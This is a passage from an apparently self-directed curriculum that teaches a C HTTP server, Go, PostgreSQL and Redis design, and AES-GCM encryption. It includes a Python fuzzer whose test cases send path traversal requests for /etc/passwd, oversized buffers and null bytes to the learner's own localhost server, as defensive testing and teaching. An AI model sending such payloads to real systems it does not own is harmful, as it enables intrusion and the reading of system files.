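    """Return base * ratio**n for each step, rounded to the nearest grid multiple."""
    return [grid * round(base * ratio**n / grid) for n in steps]


# Raw values are 12.8, 16, 20, 25, 31.25, 39.06 before snapping.
print(modular_scale())
```

The raw 1.25 scale never lands on 14, which is why 14px is best treated as a deliberate extra rather than a step of the scale.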

**In Figma, set these up as variables before you design anything:**

1. Create a new Figma file
2. Local Variables → Create variable collection: "Spacing"
3. Add: `space-1: 4`, `space-2: 8`, `space-3: 16`, `space-4: 24`, `space-5: 32`, `space-6: 48`, `space-7: 64`
4. Create variable collection: "Colors" — set your brand palette
5. Enable: Preferences → Snap to pixel grid

**Every design decision you make must answer: "Which grid multiple is this?"** If the answer is "I eyeballed it," redo it.

---

### MONTH 3: THE PHASE 1 CAPSTONE — HTTP SERVER IN C

This is the most important build of Phase 1. Every concept — compilation, memory layout, pointer arithmetic, TCP/IP, HTTP parsing, GDB debugging, valgrind memory checking — converges here.

**Architecture of your server:**

```
┌──────────────────────────────────────────────────────────┐
│                     HTTP Server in C                     │
│                                                          │
│  main()                                                  │
│    └─▶ create_socket()        socket()                   │
│    └─▶ bind_socket()          bind()                     │
│    └─▶ listen_socket()        listen()                   │
│    └─▶ accept_loop()                                     │
│           └─▶ [new connection]                           │
│                  └─▶ pthread_create()                    │
│                         └─▶ handle_client()              │
│                                └─▶ parse_http_request()  │
│                                └─▶ route_request()       │
│                                └─▶ send_http_response()  │
│                                └─▶ log_request()         │
│                                └─▶ close(client_fd)      │
└──────────────────────────────────────────────────────────┘
```

**Build it in these exact stages — do not skip ahead:**

#### Stage 1: TCP Socket That Accepts a Connection

```c
// server_v1.c — just accept one connection and print what it sends
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORT 8080
#define BUFFER_SIZE 4096

int main() {
    int server_fd, client_fd;
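    struct sockaddr_in address = {0};      // Zero the padding bytes before filling in fields
    socklen_t addrlen = sizeof(address);   // accept() expects a socklen_t, not an int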
    char buffer[BUFFER_SIZE] = {0};

    // Create socket file descriptor
    server_fd = socket(AF_INET, SOCK_STREAM, 0);
    if (server_fd < 0) { perror("socket"); exit(EXIT_FAILURE); }

    // Allow port reuse (prevents "Address already in use" on restart)
    int opt = 1;
    setsockopt(server_fd, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));

    // Bind to port 8080 on all interfaces
    address.sin_family = AF_INET;
    address.sin_addr.s_addr = INADDR_ANY;
    address.sin_port = htons(PORT);     // htons: host to network byte order
    
    if (bind(server_fd, (struct sockaddr*)&address, sizeof(address)) < 0) {
        perror("bind"); exit(EXIT_FAILURE);
    }

    // Listen (backlog of 10 pending connections)
    if (listen(server_fd, 10) < 0) { perror("listen"); exit(EXIT_FAILURE); }
    
    printf("Server listening on port %d\n", PORT);

    // Accept ONE connection
    client_fd = accept(server_fd, (struct sockaddr*)&address, (socklen_t*)&addrlen);
    if (client_fd < 0) { perror("accept"); exit(EXIT_FAILURE); }

    // Read what the client sent
    ssize_t bytes_read = read(client_fd, buffer, BUFFER_SIZE - 1);
    if (bytes_read < 0) { perror("read"); exit(EXIT_FAILURE); }
    printf("Received %zd bytes:\n%s\n", bytes_read, buffer);

    close(client_fd);
    close(server_fd);
    return 0;
}
```

```bash
gcc -o server_v1 server_v1.c
./server_v1
# In another terminal:
curl http://localhost:8080/
```

Your server will print the raw HTTP GET request that curl sent. **This is the HTTP protocol you studied — now you see it as raw bytes arriving in a C buffer.**
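The `htons(PORT)` call in the listing exists because the wire format is big-endian while x86_64 is little-endian. A quick sketch of what that means for port 8080, using Python's `struct` module as a stand-in for the C call:

```python
import socket
import struct

PORT = 8080  # 0x1F90

network_order = struct.pack("!H", PORT)  # "!" = network (big-endian) byte order
little_endian = struct.pack("<H", PORT)  # how an x86_64 host stores the same value

print("network order:", network_order.hex())
print("little-endian:", little_endian.hex())

# htons followed by ntohs always returns the original value, whatever the host order.
print("round trip:", socket.ntohs(socket.htons(PORT)))
```

Forget `htons` on a little-endian machine and the server binds to port 36895 (0x901F) instead of 8080.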

#### Stage 2: Parse HTTP Request and Send a Response

```c
// Add this function to parse the request line:
typedef struct {
    char method[8];       // "GET", "POST", etc.
    char path[256];       // "/index.html"
    char version[16];     // "HTTP/1.1"
} HttpRequest;

int parse_request(const char *raw, HttpRequest *req) {
    // First line is: "GET /path HTTP/1.1\r\n"
    return sscanf(raw, "%7s %255s %15s", req->method, req->path, req->version);
}

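// Response generation:
void send_response(int client_fd, int status, const char *body) {
    char header[256];
    const char *status_text = (status == 200) ? "OK" :
                              (status == 404) ? "Not Found" : "Internal Server Error";
    size_t body_len = strlen(body);

    int len = snprintf(header, sizeof(header),
        "HTTP/1.1 %d %s\r\n"
        "Content-Type: text/html\r\n"
        "Content-Length: %zu\r\n"
        "Connection: close\r\n"
        "\r\n",
        status, status_text, body_len);
    if (len < 0 || (size_t)len >= sizeof(header)) return;  // header was truncated

    // Headers and body go out separately: snprintf returns the length it WANTED
    // to write, so copying a large body into one fixed buffer would over-read it.
    // (write() may also send fewer bytes than asked; loop on it in the real server.)
    write(client_fd, header, (size_t)len);
    write(client_fd, body, body_len);
}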
```

#### Stage 3: Multi-Threading With pthreads

```c
#include <pthread.h>

void *handle_client_thread(void *arg) {
    int client_fd = *(int*)arg;
    free(arg);  // We malloc'd this in the accept loop
    
    // ... parse request, send response ...
    
    close(client_fd);
    return NULL;
}

// In the accept loop:
while (1) {
    int *client_fd = malloc(sizeof(int));  // Heap-allocate to avoid race condition
    if (!client_fd) { perror("malloc"); continue; }
    
    *client_fd = accept(server_fd, (struct sockaddr*)&address, (socklen_t*)&addrlen);
    if (*client_fd < 0) { perror("accept"); free(client_fd); continue; }
    
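    pthread_t thread;
    if (pthread_create(&thread, NULL, handle_client_thread, client_fd) != 0) {
        // The thread never started, so nobody else will clean up this connection
        close(*client_fd);
        free(client_fd);
        continue;
    }
    pthread_detach(thread);  // Don't wait for thread to finish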
}
```

**Why heap-allocate `client_fd`?** If you pass a stack pointer to the thread:
```c
// WRONG:
int client_fd = accept(...);
pthread_create(&thread, NULL, handle_client_thread, &client_fd);
// By the time the thread reads it, the loop has iterated and client_fd is overwritten.
```
This is a **race condition** — the exact vulnerability class you study in Phase 2's PortSwigger labs. You will experience it in your own code first.
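The same bug can be reproduced deterministically in a few lines. This sketch is a simulation, not your server: a one-element list stands in for the loop's single stack variable, and an `Event` forces the worst-case timing in which every worker reads only after the loop has finished (all names here are illustrative):

```python
import threading


def run(copy_per_thread: bool):
    """Start three workers and return the 'file descriptors' they observed."""
    slot = [0]                # stands in for the one stack variable in the loop
    go = threading.Event()    # holds every worker until the loop is done
    seen = []

    def worker(box):
        go.wait()
        seen.append(box[0])

    threads = []
    for fd in (1, 2, 3):
        slot[0] = fd
        # A fresh list per thread mirrors the malloc'd int; sharing slot mirrors &client_fd.
        box = [fd] if copy_per_thread else slot
        t = threading.Thread(target=worker, args=(box,))
        t.start()
        threads.append(t)
    go.set()
    for t in threads:
        t.join()
    return sorted(seen)


print("shared slot:  ", run(copy_per_thread=False))
print("own copy each:", run(copy_per_thread=True))
```

In the C server the bad interleaving happens only some of the time, which is what makes the bug hard to catch by testing alone.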

#### Stage 4: The Python Fuzzer

```python
# fuzzer.py
import socket
import random
import string
import time

TARGET_HOST = "127.0.0.1"
TARGET_PORT = 8080

def send_raw(payload: bytes) -> str:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(3)
        s.connect((TARGET_HOST, TARGET_PORT))
        s.sendall(payload)
        response = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            response += chunk
        s.close()
        return response.decode('utf-8', errors='replace')
    except Exception as e:
        return f"ERROR: {e}"

# Test cases — each tests a different failure mode:
test_cases = [
    # Oversized method
    (b"A" * 10000 + b" / HTTP/1.1\r\nHost: localhost\r\n\r\n", "OVERFLOW: Method"),
    # Oversized path
    (b"GET /" + b"A" * 50000 + b" HTTP/1.1\r\nHost: localhost\r\n\r\n", "OVERFLOW: Path"),
    # Directory traversal
    (b"GET /../../../etc/passwd HTTP/1.1\r\nHost: localhost\r\n\r\n", "TRAVERSAL: etc/passwd"),
    (b"GET /..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\r\nHost: localhost\r\n\r\n", "TRAVERSAL: URL-encoded"),
    # Malformed request line
    (b"GET\r\n\r\n", "MALFORMED: no path"),
    (b"\r\n\r\n", "MALFORMED: empty"),
    # Null bytes
    (b"GET /\x00 HTTP/1.1\r\nHost: localhost\r\n\r\n", "NULL BYTE in path"),
    # Huge headers
    (b"GET / HTTP/1.1\r\n" + b"X-Custom: " + b"A" * 100000 + b"\r\n\r\n", "OVERFLOW: Header"),
    # HTTP/0.9 (no headers)
    (b"GET /\r\n", "HTTP/0.9 style"),
    # Body without Content-Length
    (b"POST / HTTP/1.1\r\nHost: localhost\r\n\r\n" + b"A" * 10000, "POST: no Content-Length"),
]

print(f"{'='*60}")
print(f"FUZZING {TARGET_HOST}:{TARGET_PORT}")
print(f"{'='*60}\n")

for payload, label in test_cases:
    print(f"[*] Sending: {label}")
    result = send_raw(payload)
    if result.startswith("ERROR"):
        # A refused or reset connection often means a crash, but confirm in the server's terminal.
        print(f"[!] NO RESPONSE (possible crash): {result}")
    elif result.startswith("HTTP/"):
        status = result.split('\r\n')[0]
        print(f"[+] Response: {status}")
    else:
        print(f"[?] Unexpected: {result[:100]!r}")
    time.sleep(0.1)

print("\nFuzz complete.")
```

**When your server crashes:** Run it in GDB:
```bash
gdb ./server
(gdb) run
# Trigger the crash with the fuzzer
(gdb) backtrace          # Where did it crash?
(gdb) frame 0            # What was the state?
(gdb) info locals        # What were the variable values?
(gdb) x/32xb $rsp       # What does the stack look like?
```

Read the crash. Understand why it crashed. Fix the C code. Re-run valgrind. Re-run the fuzzer. This loop is **exactly what security researchers do with real software**, except the software is not yours.
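
From the socket side, a crash, a timeout, and a refused connection can all look alike. If you launch the server as a child process from Python, the exit code tells you which signal killed it. A minimal sketch, assuming a POSIX system; `describe_exit` and `run_and_report` are hypothetical helper names, not part of the fuzzer above:

```python
import signal
import subprocess
import sys

def describe_exit(returncode: int) -> str:
    """Translate a subprocess return code into a human-readable verdict."""
    if returncode < 0:
        # On POSIX, a negative return code means "terminated by signal -returncode".
        return f"killed by {signal.Signals(-returncode).name}"
    return f"exited with status {returncode}"

def run_and_report(argv: list[str]) -> str:
    """Run a command to completion and describe how it ended."""
    proc = subprocess.run(argv, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return describe_exit(proc.returncode)
```

For a long-running server you would use `subprocess.Popen` and call `poll()` after each test case instead of waiting for the process to finish. A `killed by SIGSEGV` verdict is your cue to rerun that exact payload under GDB.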

---

# PHASE 1 → PHASE 2 CONNECTION MAP

Before starting Phase 2, every arrow below must be checkable:

```
C HTTP Server (Phase 1)
    ↓
Understanding of TCP connections, HTTP parsing, concurrent threads, memory safety
    ↓
Phase 2: You will write a Go HTTP API server.
The Go net/http package does everything your C server did — but automatically.
You will understand WHAT it's doing and WHERE bugs can exist because you built one from scratch.

Stack/Heap Memory Model (Phase 1)
    ↓
Mental model of where variables live and how they're accessed
    ↓
Phase 2: PostgreSQL stores table rows in fixed-size pages on disk and finds them through
B-tree indexes (DDIA Chapter 3). "How data is organized in memory/storage" is the same model, scaled up.

SQL Injection understanding (Phase 1 PortSwigger)
    ↓
Visceral understanding of why unparameterized queries are dangerous
    ↓
Phase 2: Every database query you write in Go uses pgx's parameterized queries.
You don't follow this rule because a linter says so. You follow it because you know what happens if you don't.

Burp Suite Repeater/Intruder (Phase 1)
    ↓
Ability to intercept, modify, and replay HTTP traffic at the byte level
    ↓
Phase 2 PortSwigger: SSRF, OAuth flaws, and Race Conditions all require precise
request manipulation. The tool is the same. The targets are harder.
```

---
---

# PHASE 2: MONTHS 4–6 — HIGH-FIDELITY CREATOR
## *Production Data Systems, Cryptographic Engineering, Logic Exploitation*

---

## THE CENTRAL THESIS OF PHASE 2

> **State is the attack surface.** Every logic vulnerability — SSRF, OAuth flaws, race conditions, insecure deserialization — is a consequence of a system that has more state than it can coherently validate. A race condition is two threads writing to the same state simultaneously. An OAuth flaw is the server trusting state it didn't generate. SSRF is the server performing network requests on behalf of state it accepted from the user. Phase 2 builds production-grade state management systems so you can learn to break them.

---

### MONTH 4, WEEK 1–2: DESIGNING DATA-INTENSIVE APPLICATIONS (DDIA)
**Chapters 1–5 — What You Actually Need**

Martin Kleppmann's DDIA is the most important book for understanding how production databases work. You are reading it because in Phase 2 you will use PostgreSQL, and in Phase 2's security block you will break systems that rely on database-backed state.

**Chapter 1 — Reliable, Scalable, Maintainable Systems:**
The three pillars. Reliability means the system works correctly even when things go wrong. Scalability means the system handles growth. Maintainability means other people can operate it. Every architectural decision in your SecureDrop clone will be evaluated against these.

**Chapter 3 — Storage and Retrieval (The Critical Chapter):**

This chapter explains what a database *actually does* with your data. Two storage engine models:

```
Log-Structured (LSM Tree) — e.g., RocksDB, Cassandra
Write path: Append to in-memory memtable → flush to SSTable on disk
Read path: Search memtable → search SSTables (newest to oldest)
Best for: Write-heavy workloads

Page-Oriented (B-Tree) — e.g., PostgreSQL, MySQL
Write path: Append the change to the write-ahead log (WAL) for durability → find page → modify page
Read path: Traverse B-tree from root to leaf
Best for: Read-heavy workloads, range queries
```
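
The log-structured read and write paths are easier to hold in your head once you have seen them as code. This is a toy sketch, not how RocksDB or Cassandra are implemented: `TinyLSM` is a hypothetical class, segments live in memory instead of on disk, and there is no compaction.

```python
import bisect

class TinyLSM:
    """Toy LSM store: one in-memory memtable plus immutable sorted segments."""

    def __init__(self, memtable_limit: int = 2):
        self.memtable: dict[str, str] = {}
        self.segments: list[list[tuple[str, str]]] = []  # oldest first
        self.memtable_limit = memtable_limit

    def put(self, key: str, value: str) -> None:
        # Write path: update the memtable, flush when it is full.
        self.memtable[key] = value
        if len(self.memtable) >= self.memtable_limit:
            self.flush()

    def flush(self) -> None:
        # An SSTable is a sorted, immutable run of key/value pairs.
        self.segments.append(sorted(self.memtable.items()))
        self.memtable = {}

    def get(self, key: str):
        # Read path: memtable first, then segments from newest to oldest.
        if key in self.memtable:
            return self.memtable[key]
        for segment in reversed(self.segments):
            keys = [k for k, _ in segment]
            i = bisect.bisect_left(keys, key)
            if i < len(segment) and segment[i][0] == key:
                return segment[i][1]
        return None
```

Notice that an overwritten key still exists in an older segment. Reads stay correct only because newer segments are searched first, which is why real engines need background compaction.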

**PostgreSQL's default index type is a B-tree.** When you run `SELECT * FROM files WHERE owner_id = 42`, PostgreSQL can traverse a B-tree index on `owner_id` to find the matching rows. Without the index, it scans every row in the table. **This is why you create indexes.** You will know this because you read Chapter 3, not because a tutorial told you to add `CREATE INDEX`.
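
To feel the difference between a full scan and an index lookup, compare the two on a tiny in-memory table. This is a sketch under loud assumptions: a sorted Python list stands in for the ordered leaf level of a B-tree, and `seq_scan` / `index_scan` are hypothetical names, not PostgreSQL internals.

```python
import bisect

# (owner_id, filename) rows in insertion order, like an unordered table.
rows = [(owner_id, f"file_{i}") for i, owner_id in enumerate([7, 42, 3, 42, 19, 42, 7])]

def seq_scan(owner_id: int) -> list[str]:
    """No index: look at every row."""
    return [name for oid, name in rows if oid == owner_id]

# Sorted (key, row_position) pairs stand in for the index's ordered entries.
index = sorted((oid, pos) for pos, (oid, _) in enumerate(rows))

def index_scan(owner_id: int) -> list[str]:
    """Index: binary-search to the first match, then walk its neighbours."""
    i = bisect.bisect_left(index, (owner_id, -1))
    out = []
    while i < len(index) and index[i][0] == owner_id:
        out.append(rows[index[i][1]][1])
        i += 1
    return out
```

Both functions return the same rows. The scan touches all seven; the index lookup touches a logarithmic number of entries plus the matches. On a table with millions of rows, that gap is the whole argument for `CREATE INDEX`.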

**Chapter 5 — Replication:**
Leader-follower replication (older texts say master-slave), replication lag, read-your-writes consistency. This becomes relevant in Phase 4 when you reason about race conditions in your live system: if a write hasn't replicated yet and a read hits a follower, what does the user see?

---

### MONTH 4, WEEK 2–4: Go — The Language of Your Backend

**Read the canonical reference first:** *The Go Programming Language* by Donovan & Kernighan, Chapters 1–5, before writing production Go.

**Go's mental model vs. C and TypeScript:**

```
C:           Manual memory management. You control every byte.
TypeScript:  Garbage collected. You describe types; V8 manages memory.
Go:          Garbage collected, but with explicit concurrency primitives
             (goroutines, channels). You don't manage memory, but you 
             manage concurrent state explicitly.
```

**The five Go concepts you must master before Phase 2 builds:**

#### 1. Goroutines — Not Threads

```go
// A goroutine is a lightweight execution unit scheduled by the Go runtime, not the OS.
// The runtime multiplexes thousands of goroutines onto a small pool of OS threads.

go func() {
    // This runs concurrently
    fmt.Println("running in a goroutine")
}()

// Compare to Phase 1 pthreads:
// pthread_create() creates an OS thread — expensive (1MB+ stack, OS scheduling)
// go func(){}() creates a goroutine — cheap (2KB initial stack, Go scheduler)

// Your Phase 3 concurrent fuzzer will launch hundreds of goroutines.
// In C, that would require hundreds of OS threads. In Go, it's trivial.
```

#### 2. Channels — Safe Communication Between Goroutines

```go
// The race condition you saw in your C server's accept loop?
// Channels help you avoid that class of bug: you hand a value over instead of sharing a pointer.

results := make(chan string, 100)  // Buffered channel

go func() {
    results <- "scan result 1"   // Send
}()

result := <-results              // Receive (blocks until data available)
```

#### 3. The `context` Package — Request Lifecycle Management

```go
// Every HTTP handler in your Go API receives a context.
// Context carries deadlines, cancellation signals, and request-scoped values.

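func (h *Handler) GetFile(w http.ResponseWriter, r *http.Request) {
    ctx := r.Context()  // Get request context
    fileID := r.URL.Query().Get("id")  // illustrative: use whatever your router provides

    // Database query respects cancellation:
    // If client disconnects, ctx is cancelled, query stops.
    // (database/sql shown here; with pgx the equivalent call is pool.QueryRow(ctx, ...).)
    var filename string
    err := h.db.QueryRowContext(ctx, "SELECT filename FROM files WHERE id = $1", fileID).Scan(&filename)
    if err != nil {
        http.Error(w, "not found", http.StatusNotFound)
        return
    }

    // Why this matters for security: 
    // Without context, a slow query holds a DB connection indefinitely.
    // This is exploitable as a resource exhaustion attack.
}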
```

#### 4. Error Handling — The Go Way

```go
// Go has no exceptions. Errors are values returned explicitly.
// This is verbose but forces you to handle every failure path.

file, err := os.Open(filename)
if err != nil {
    // Handle it. If you skip this check, every later use of file operates on a nil value.
    return fmt.Errorf("opening file %s: %w", filename, err)
}
defer file.Close()  // defer: runs when function returns, even on error

// Why this matters for your C background:
// In C, you checked errno and return codes manually.
// Go formalizes this pattern. Same philosophy, made visible in every function signature.
```

#### 5. Interfaces — Duck Typing with Type Safety

```go
// In Go, a type implements an interface implicitly.
// If it has the right methods, it satisfies the interface.

type Storage interface {
    StoreFile(ctx context.Context, file []byte) (string, error)
    GetFile(ctx context.Context, id string) ([]byte, error)
}

// Your SecureDrop clone will have a PostgreSQL implementation:
type PostgresStorage struct { db *pgxpool.Pool }

// And a mock implementation for testing:
type MockStorage struct { files map[string][]byte }

// Both satisfy Storage once each defines StoreFile and GetFile with these signatures.
// Your handlers depend on Storage, not PostgresStorage.
// This is how you write testable Go.
```

---

### MONTH 4–5: THE DATABASE LAYER — PostgreSQL AND REDIS

**PostgreSQL schema for SecureDrop clone:**

```sql
-- Run this in psql or via a migration tool (golang-migrate)

CREATE EXTENSION IF NOT EXISTS "uuid-ossp";

CREATE TABLE users (
    id          UUID PRIMARY KEY DEFAULT uuid_generate_v4(),
    email       TEXT UNIQUE NOT NULL,
    -- NEVER store plaintext passwords. NEVER.
    -- argon2id hash:
    password_hash TEXT NOT NULL,
    created_at  TIMESTAMPTZ DEFAULT NOW(),
    updated_at  TIMESTAMPTZ DEFAULT NOW()
);

CREATE TABLE files (
    id              UUID PRIMARY KEY DEFAULT uuid_generate_v4(),
    owner_id        UUID NOT NULL REFERENCES users(id) ON DELETE CASCADE,
    filename        TEXT NOT NULL,
    -- The actual encrypted bytes are stored in object storage or filesystem.
    -- The DB stores metadata and the encryption parameters.
    size_bytes      BIGINT NOT NULL,
    -- AES-GCM encryption parameters (stored per-file):
    iv              BYTEA NOT NULL,  -- 12 bytes for AES-GCM
    -- The encrypted file key (key is encrypted with user's derived master key)
    encrypted_key   BYTEA NOT NULL,
    created_at      TIMESTAMPTZ DEFAULT NOW()
);

-- Index for fast lookup of a user's files:
CREATE INDEX idx_files_owner_id ON files(owner_id);

-- Audit log — every file access is recorded:
CREATE TABLE access_log (
    id          BIGSERIAL PRIMARY KEY,
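    -- SET NULL keeps the log row when its file or user is deleted.
    -- Without an ON DELETE action, these references would block the cascade from users.
    file_id     UUID REFERENCES files(id) ON DELETE SET NULL,
    user_id     UUID REFERENCES users(id) ON DELETE SET NULL,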
    action      TEXT NOT NULL,  -- 'upload', 'download', 'delete'
    ip_address  INET,
    accessed_at TIMESTAMPTZ DEFAULT NOW()
);
```

**Why this schema makes security sense:**
- `iv` is stored per file: every encryption generates a fresh random nonce, and decryption needs that exact value back
- `encrypted_key` is stored per file: If the storage backend is breached, encrypted file keys without the user's master key are useless
- `access_log`: Complete audit trail for incident response
- `ON DELETE CASCADE`: Deleting a user deletes their file metadata rows. The encrypted blobs live outside the database, so your application must delete those too or they are orphaned
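
You can watch foreign-key actions fire without a PostgreSQL server. The sketch below uses SQLite and integer IDs as stand-ins for the real schema, and it assumes `ON DELETE SET NULL` on the log table as one way to keep audit rows after their file is gone. Treat it as an experiment, not as the project's migration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("PRAGMA foreign_keys = ON")  # SQLite enforces foreign keys only when asked
conn.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT UNIQUE NOT NULL);
CREATE TABLE files (
    id INTEGER PRIMARY KEY,
    owner_id INTEGER NOT NULL REFERENCES users(id) ON DELETE CASCADE,
    filename TEXT NOT NULL
);
CREATE TABLE access_log (
    id INTEGER PRIMARY KEY,
    file_id INTEGER REFERENCES files(id) ON DELETE SET NULL,
    action TEXT NOT NULL
);
INSERT INTO users VALUES (1, 'a@example.com');
INSERT INTO files VALUES (10, 1, 'report.pdf');
INSERT INTO access_log VALUES (100, 10, 'upload');
""")

# Deleting the user cascades to files; the log row survives with file_id = NULL.
conn.execute("DELETE FROM users WHERE id = 1")
files_left = conn.execute("SELECT COUNT(*) FROM files").fetchone()[0]
log_rows = conn.execute("SELECT file_id, action FROM access_log").fetchall()
```

Try removing `ON DELETE SET NULL` and rerunning: the `DELETE` fails with a foreign-key error, which is the behavior you get by default when a referencing table declares no action.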

**Redis — what you use it for in this project:**

```
PostgreSQL:
  - Persistent data (users, files, access_log)
  - Source of truth
  - Transactional (ACID)

Redis:
  - Session tokens (expire automatically via TTL)
  - Rate limiting counters (prevent brute force)
  - Upload job queues (async processing)
  - NOT for persistent data you can't lose
```

```go
// Redis session example:
func (s *SessionStore) Create(ctx context.Context, userID string) (string, error) {
    token := generateSecureToken(32)  // crypto/rand, not math/rand
    
    key := "session:" + token
    err := s.client.Set(ctx, key, userID, 24*time.Hour).Err()
    if err != nil {
        return "", fmt.Errorf("creating session: %w", err)
    }
    return token, nil
}

func (s *SessionStore) Validate(ctx context.Context, token string) (string, error) {
    key := "session:" + token
    userID, err := s.client.Get(ctx, key).Result()
    if errors.Is(err, redis.Nil) {
        return "", ErrInvalidSession  // unknown or expired token
    }
    if err != nil {
        return "", fmt.Errorf("validating session: %w", err)
    }
    return userID, nil
}
```
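
The rate limiting counters in the list above follow one pattern: increment a per-client key and let it expire. Here is that pattern as an in-memory sketch. `FixedWindowLimiter` is a hypothetical class that imitates Redis `INCR` plus a key expiry; it is not a Redis client, and the injectable `clock` exists only so you can test it without sleeping.

```python
import time

class FixedWindowLimiter:
    """In-memory stand-in for an INCR + expiry counter on a per-client key."""

    def __init__(self, limit: int, window_seconds: float, clock=time.monotonic):
        self.limit = limit
        self.window = window_seconds
        self.clock = clock
        self.counters: dict[str, tuple[int, float]] = {}  # key -> (count, expires_at)

    def allow(self, key: str) -> bool:
        now = self.clock()
        count, expires_at = self.counters.get(key, (0, 0.0))
        if now >= expires_at:
            # The window elapsed, which is what key expiry does for you in Redis.
            count, expires_at = 0, now + self.window
        count += 1  # the INCR step
        self.counters[key] = (count, expires_at)
        return count <= self.limit
```

With `limit=5, window_seconds=60` keyed on `"login:" + ip`, the sixth login attempt inside a minute is refused. In a real deployment the increment and the expiry must happen atomically on the Redis side, for the same reason the race condition section later insists on atomic database updates.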

---

### MONTH 5: AES-GCM-256 — THE CRYPTOGRAPHIC CORE

**Read *"Real-World Cryptography"* by David Wong, Chapters 1–3, before implementing any of this.**

AES-GCM (Galois/Counter Mode) is authenticated encryption — it provides both **confidentiality** (encrypted data cannot be read) and **authenticity** (encrypted data cannot be tampered with undetected).

**The parameters:**
```
Key:  256 bits (32 bytes) — the secret. Derived from user password via PBKDF2/Argon2.
IV:   96 bits  (12 bytes) — the nonce. Must be unique per encryption operation.
Tag:  128 bits (16 bytes) — the authentication tag. Verifies integrity on decrypt.
```

**The IV is the most dangerous parameter.** AES-GCM uses CTR mode under the hood. CTR mode XORs the keystream with plaintext. If you encrypt two different plaintexts with the same key AND the same IV, an attacker can XOR the two ciphertexts together and cancel the keystream, recovering the XOR of the two plaintexts. Nonce reuse also leaks GCM's internal authentication key, which lets the attacker forge valid tags. This is catastrophic.

```go
// WRONG: Deterministic IV generation
iv := make([]byte, 12)
copy(iv, []byte("file"+fileID))  // NEVER do this. Re-encrypting the same file reuses the nonce.

// CORRECT: Cryptographically random IV per encryption:
iv := make([]byte, 12)
if _, err := io.ReadFull(rand.Reader, iv); err != nil {
    return nil, fmt.Errorf("generating IV: %w", err)
}
// Store iv alongside ciphertext. It is NOT secret — it just must be unique.
```
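
Do not take the keystream-cancellation claim on faith. The sketch below reproduces it with a toy stream cipher: `toy_keystream` builds a counter-mode keystream from SHA-256, which is an assumption made so the example runs on the standard library alone. It is not AES and has no authentication tag, but the XOR algebra is identical to CTR mode.

```python
import hashlib

def toy_keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream built from SHA-256. A toy stand-in for AES-CTR."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def toy_encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    return xor(plaintext, toy_keystream(key, nonce, len(plaintext)))

key = b"k" * 32
nonce = b"n" * 12  # reused on purpose
p1 = b"transfer $100 to alice"
p2 = b"transfer $999 to mallory"[:len(p1)]
c1 = toy_encrypt(key, nonce, p1)
c2 = toy_encrypt(key, nonce, p2)

# The keystream cancels: the attacker learns p1 XOR p2 without ever seeing the key.
leak = xor(c1, c2)
# Knowing (or guessing) one plaintext then reveals the other outright.
recovered_p2 = xor(leak, p1)
```

Change `nonce` for the second encryption and the cancellation disappears. That single difference is why the correct Go snippet draws every IV from `crypto/rand`.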

**Complete AES-GCM-256 encryption in Go:**

```go
package crypto

import (
    "crypto/aes"
    "crypto/cipher"
    "crypto/rand"
    "fmt"
    "io"
)

// EncryptFile encrypts plaintext with AES-GCM-256.
// Returns: ciphertext || tag (GCM appends the tag automatically)
// The IV is returned separately — store it with the ciphertext.
func EncryptFile(key []byte, plaintext []byte) (ciphertext []byte, iv []byte, err error) {
    if len(key) != 32 {
        return nil, nil, fmt.Errorf("key must be 32 bytes, got %d", len(key))
    }

    block, err := aes.NewCipher(key)
    if err != nil {
        return nil, nil, fmt.Errorf("creating cipher: %w", err)
    }

    gcm, err := cipher.NewGCM(block)
    if err != nil {
        return nil, nil, fmt.Errorf("creating GCM: %w", err)
    }

    // Generate cryptographically random nonce
    iv = make([]byte, gcm.NonceSize())  // 12 bytes for standard GCM
    if _, err := io.ReadFull(rand.Reader, iv); err != nil {
        return nil, nil, fmt.Errorf("generating nonce: %w", err)
    }

    // Seal encrypts and appends authentication tag
    // Signature: Seal(dst, nonce, plaintext, additionalData)
    ciphertext = gcm.Seal(nil, iv, plaintext, nil)
    // ciphertext is now: encrypted_content || 16-byte_auth_tag
    
    return ciphertext, iv, nil
}

func DecryptFile(key []byte, ciphertext []byte, iv []byte) ([]byte, error) {
    if len(key) != 32 {
        return nil, fmt.Errorf("key must be 32 bytes")
    }

    block, err := aes.NewCipher(key)
    if err != nil {
        return nil, fmt.Errorf("creating cipher: %w", err)
    }

    gcm, err := cipher.NewGCM(block)
    if err != nil {
        return nil, fmt.Errorf("creating GCM: %w", err)
    }

    // Open decrypts AND verifies the authentication tag
    // If the ciphertext was tampered with, this returns an error.
    plaintext, err := gcm.Open(nil, iv, ciphertext, nil)
    if err != nil {
        // Important: do NOT expose whether decryption failed due to wrong key
        // vs. tampered data. Return a generic error.
        return nil, fmt.Errorf("decryption failed")
    }

    return plaintext, nil
}
```

**Key derivation from password using Argon2id:**

```go
import "golang.org/x/crypto/argon2"

func DeriveKey(password string, salt []byte) []byte {
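    // Argon2id parameters (the example values from the golang.org/x/crypto/argon2 docs):
    // time=1, memory=64 MiB, threads=4, keyLen=32. Check current OWASP guidance before shipping.
    // salt must be random (16+ bytes from crypto/rand), unique per user, and stored with the hash.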
    return argon2.IDKey(
        []byte(password), 
        salt,
        1,       // time (iterations)
        64*1024, // memory in KiB (64MB)
        4,       // parallelism
        32,      // output key length (256-bit for AES-256)
    )
}
```
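
The salt deserves as much attention as the password. This sketch shows the salt lifecycle using PBKDF2, which the parameter list above mentions as an alternative, because Python's standard library ships it and does not ship Argon2id. `new_salt` and `derive_key_pbkdf2` are hypothetical names, and the default iteration count is an assumption you should tune for your hardware.

```python
import hashlib
import secrets

def new_salt() -> bytes:
    """16 random bytes, generated once per user and stored next to the hash."""
    return secrets.token_bytes(16)

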